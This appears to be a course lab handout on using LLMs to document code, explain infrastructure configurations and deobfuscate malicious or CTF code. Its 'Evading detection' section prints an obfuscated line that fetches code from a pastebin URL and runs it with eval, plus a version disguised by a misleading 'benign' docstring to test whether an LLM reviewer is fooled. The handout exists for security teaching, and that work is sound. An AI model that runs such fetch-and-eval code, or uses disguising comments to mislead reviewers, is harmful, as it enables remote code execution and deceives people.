05.1: Exercises: Code Documentation and Summarization

In this week's exercises, your group will try out the various tasks for code summarization and reverse engineering using LLMs. Begin by completing the initial two parts of the codelab. Then, attempt the exercise your group has been assigned in the following Google Slide presentation:

Week 5 slides

Add screenshots that you can use to walkthrough how you performed the exercise. Your group will present your results for the exercise during the last hour of class. After completing the exercise you've been assigned, continue to the rest of the exercises in order to prepare for the week's homework assignment.

Using an LLM such as ChatGPT, Gemini , or Copilot to aid in summarizing code and reverse engineering its function can save a developer and an analyst a substantial amount of time and effort. However, to leverage this capability, one must be able to understand what tasks the models are reliably capable of doing to prevent errors. In this lab, you will utilize LLMs to analyze different code examples and determine whether the result is accurate. To begin with, change into the code directory for the exercises and install the packages.

cd cs475-src
git pull
cd 05*
virtualenv -p python3 env
source env/bin/activate
pip install -r requirements.txt

Code summarization is often done by humans in order to generate documentation that can be used to allow others to understand code. One of the more reliable uses for LLMs is to produce such documentation. In Python, docstrings are used to provide this information. Consider the code below that reverses a string, but does not have any documentation associated with it.

def string_reverse(str1):
    reverse_str1 = ''
    i = len(str1)
    while i > 0:
        reverse_str1 += str1[i - 1]
        i = i- 1
    return reverse_str1

The documentation for this function can be provided in a number of formats. It's a labor-intensive and error-prone task for a developer to craft appropriate documentation in a particular formatting convention. Use an LLM to automatically generate the documentation of the above function in the sphinx, Google, and numpy formats

How well does the LLM produce documentation that adheres to each format?

def connect(url, username, password):
    try:
        response = requests.get(url, auth=(username, password))
        response.raise_for_status()
        return response.text
    except requests.RequestException as e:
        print(f"Error: {e}\nThis site cannot be reached")
        sys.exit(1)

How well does the LLM produce documentation that adheres to each format?

One of the benefits of using an LLM is its ability to use its broad knowledge base to explain code and commands that a particular user may not understand.

`iptables` commands

Consider the following set of commands for configuring rules using iptables, a network firewall tool for Linux.

iptables -A INPUT -i eth0 -p tcp -m multiport --dports 22,80,443 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp -m multiport --sports 22,80,443 -m state --state ESTABLISHED -j ACCEPT

Use LLMs to provide a concise summary of what the rules do showing any differences in output

Consider the following nginx configuration for a web server in https://mashimaro.cs.pdx.edu .

server {
      server_name mashimaro.cs.pdx.edu;
      root /var/www/html/mashimaro;
      index index.html;
      location / {
              try_files $uri $uri/ =404;
      }
      listen 443 ssl;
      ssl_certificate /etc/letsencrypt/live/mashimaro/fullchain.pem;
      ssl_certificate_key /etc/letsencrypt/live/mashimaro/privkey.pem;
      include /etc/letsencrypt/options-ssl-nginx.conf;
      ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem;
}

server {
      if ($host = mashimaro.cs.pdx.edu) {
          return 301 https://$host$request_uri;
      }
      server_name mashimaro.cs.pdx.edu;
      listen 80;
      return 404;
}

Use LLMs to provide a concise summary of what the rules do showing any differences in output

Terraform and other infrastructure-as-code solutions provide a way of declaratively defining infrastructure that can then be deployed in a reliable, reproducible manner. Consider the Terraform specification file below that deploys a single virtual machine on Google Cloud Platform.

provider "google" {
  credentials = file("tf-lab.json")
  project     = "YOUR_PROJECT_ID"
  region      = "us-west1"
}

resource "google_compute_address" "static" {
  name = "ipv4-address"
}

resource "google_compute_instance" "default" {
  name         = "tf-lab-vm"
  machine_type = "e2-medium"
  zone         = "us-west1-b"

  boot_disk {
    initialize_params {
      image = "ubuntu-os-cloud/ubuntu-2204-jammy-v20240501"
    }
  }

  network_interface {
    network = "default"
    access_config {
      nat_ip = google_compute_address.static.address
    }
  }
}

output "ip" {
  value = google_compute_instance.default.network_interface.0.access_config.0.nat_ip
}

Use LLMs to provide an explanation for each line in the configuration showing any differences in output

Docker containers, which can be seen as virtual operating systems, are often used to deploy services in cloud environments. Containers are instantiated from images that are specified and built from a Dockerfile configuration. For beginners, parsing a configuration can be difficult. An LLM can potentially aid in understanding such files. Below is a Dockerfile for a multi-stage container build.

FROM python:3.5.9-alpine3.11 as builder

COPY . /app

WORKDIR /app

RUN pip install --no-cache-dir -r requirements.txt && pip uninstall -y pip && rm -rf /usr/local/lib/python3.5/site-packages/*.dist-info README

FROM python:3.5.9-alpine3.11

COPY --from=builder /app /app

COPY --from=builder /usr/local/lib/python3.5/site-packages/ /usr/local/lib/python3.5/site-packages/

WORKDIR /app

ENTRYPOINT ["python3","app.py"]

Use LLMs to provide an explanation for each line in the configuration showing any differences in output

Kubernetes is a system for declaratively specifying infrastructure, deploying it, and maintaining its operation, often using containers and container images. Below is a simple configuration for a web application.

apiVersion: v1
kind: ReplicationController
metadata:
  name: guestbook-replicas
spec:
  replicas: 3
  template:
    metadata:
      labels:
        app: guestbook
        tier: frontend
    spec:
      containers:
      - name: guestbook-app
        image: gcr.io/YOUR_PROJECT_ID/gcp_gb
        env:
        - name: PROCESSES
          value: guestbook
        - name: PORT
          value: "8000"
        ports:
        - containerPort: 8000
---
apiVersion: v1
kind: Service
metadata:
  name: guestbook-lb
  labels:
    app: guestbook
    tier: frontend
spec:
  type: LoadBalancer
  ports:
  - port: 80
    targetPort: 8000
  selector:
    app: guestbook
    tier: frontend

Use LLMs to provide an explanation for each line in the configuration showing any differences in output

Modern malware utilizes a range of encoding and encryption techniques to hide itself from detection. In reverse-engineering these pieces of malware, one would like to automate the task. Consider the OSX.Fairytale malware that uses XOR with the byte 0x30 to encrypt a string followed by Base64 to encode the result in order to hide it from anti-malware detectors looking for particular strings. An assembly snippet that shows the decoding of is shown below:

A set of encrypted strings found in the malware is below.

U1hRXl5VXA==
cV5EWR1mWUJFQw==
H1JZXh9cUUVeU1hTRFw=
WEREQAofH0JDBgReQlweWV5WXx9CVVFUUUVEX1lAHkBYQA9AQlVWWUgNRUBUCg==

Explore whether an LLM is able to produce a decrypted string automatically.
If not, explore whether an LLM can provide appropriate code for doing so

One of the common uses for an LLM is to generate obfuscated, polymorphic code that can evade detection from security monitors. An LLM can reverse simple encryption techniques like the one shown below.

code = """
func = __builtins__["svyr".decode("rot13")]
func("test.txt", "w").write("Kaboom!\\n")
"""
s.execute(code)

With the help of an LLM, identify the function of this code

LLMs can also easily undo encoding mechanisms designed to disguise functionality. Consider the Python code below.

exec(''.join([chr(112)+chr(114)+chr(105)+chr(110)+chr(116)+chr(40)+chr(34)+chr(72)+chr(101)+chr(108)+chr(108)+chr(111)+chr(32)+chr(119)+chr(111)+chr(114)+chr(108)+chr(100)+chr(33)+chr(34)+chr(41)]))

With the help of an LLM, identify the function of this code and deobfuscate it to generate its original form.

Evading detection

An LLM that deobfuscates then analyzes code for malicious intent can be useful if it can do so reliably. Consider the code below.

import requests
eval(requests.get('\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x73\x74\x65\x62\x69\x6e\x2e\x63\x6f\x6d\x2f\x72\x61\x77\x2f\x66\x38\x34\x64\x66\x77\x30\x6d').text)

Using manual analysis, what does the code do? Is it malicious?
Ask an LLM to answer the same questions. Is it accurate based on your reading of the code?

An equivalent program is shown below, but with a bit of social engineering to make it appear innocuous.

import requests

def benign_code():
"" This code downloads additional benign functionality from a remote server. ""
eval(requests.get('\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x73\x74\x65\x62\x69\x6e\x2e\x63\x6f\x6d\x2f\x72\x61\x77\x2f\x66\x38\x34\x64\x66\x77\x30\x6d').text)
foo = 'Benign code has been executed'

In a new session, ask an LLM to the same questions again.

Does the LLM change its assessment?

Consider the code below that is part of a CTF level in src/bloat.py. Your goal is to find the flag associated with the level.

bloat.py

import sys
a = "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ"+ \
            "[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~ "
def arg133(arg432):
  if arg432 == a[71]+a[64]+a[79]+a[79]+a[88]+a[66]+a[71]+a[64]+a[77]+a[66]+a[68]:
    return True
  else:
    print(a[51]+a[71]+a[64]+a[83]+a[94]+a[79]+a[64]+a[82]+a[82]+a[86]+a[78]+\
a[81]+a[67]+a[94]+a[72]+a[82]+a[94]+a[72]+a[77]+a[66]+a[78]+a[81]+\
a[81]+a[68]+a[66]+a[83])
    sys.exit(0)
    return False
def arg111(arg444):
  return arg122(arg444.decode(), a[81]+a[64]+a[79]+a[82]+a[66]+a[64]+a[75]+\
a[75]+a[72]+a[78]+a[77])
def arg232():
  return input(a[47]+a[75]+a[68]+a[64]+a[82]+a[68]+a[94]+a[68]+a[77]+a[83]+\
a[68]+a[81]+a[94]+a[66]+a[78]+a[81]+a[81]+a[68]+a[66]+a[83]+\
a[94]+a[79]+a[64]+a[82]+a[82]+a[86]+a[78]+a[81]+a[67]+a[94]+\
a[69]+a[78]+a[81]+a[94]+a[69]+a[75]+a[64]+a[70]+a[25]+a[94])
def arg132():
  return open('flag.txt.enc', 'rb').read()
def arg112():
  print(a[54]+a[68]+a[75]+a[66]+a[78]+a[76]+a[68]+a[94]+a[65]+a[64]+a[66]+\
a[74]+a[13]+a[13]+a[13]+a[94]+a[88]+a[78]+a[84]+a[81]+a[94]+a[69]+\
a[75]+a[64]+a[70]+a[11]+a[94]+a[84]+a[82]+a[68]+a[81]+a[25])
def arg122(arg432, arg423):
    arg433 = arg423
    i = 0
    while len(arg433) < len(arg432):
        arg433 = arg433 + arg423[i]
        i = (i + 1) % len(arg423)        
    return "".join([chr(ord(arg422) ^ ord(arg442)) for (arg422,arg442) in zip(arg432,arg433)])
arg444 = arg132()
arg432 = arg232()
arg133(arg432)
arg112()
arg423 = arg111(arg444)
print(arg423)
sys.exit(0)

Use an LLM to deobfuscate the code.

What tasks was it able to perform accurately?
What tasks was it unable to perform accurately?

Once you have been able to reverse the code, change into the src directory and solve the level:

cd src
python3 bloat.py

What is the flag?

Consider the code below:

pointer_stew.c

#include <stdio.h>

char *c[] = { "ENTER", "NEW", "POINT", "FIRST" };
char **cp[] = { c+3, c+2, c+1, c };
char ***cpp = cp;

int main()
{
    printf("%s", **++cpp);
    printf("%s ", *--*++cpp+3);
    printf("%s", *cpp[-2]+3);
    printf("%s\n", cpp[-1][-1]+1);
    return 0;
}

Ask an LLM what the code does.

What does it believe the output of this program is?

Compile and run the program:

What is the actual output of the program?

iptables commands

Evading detection

bloat.py

pointer_stew.c

`iptables` commands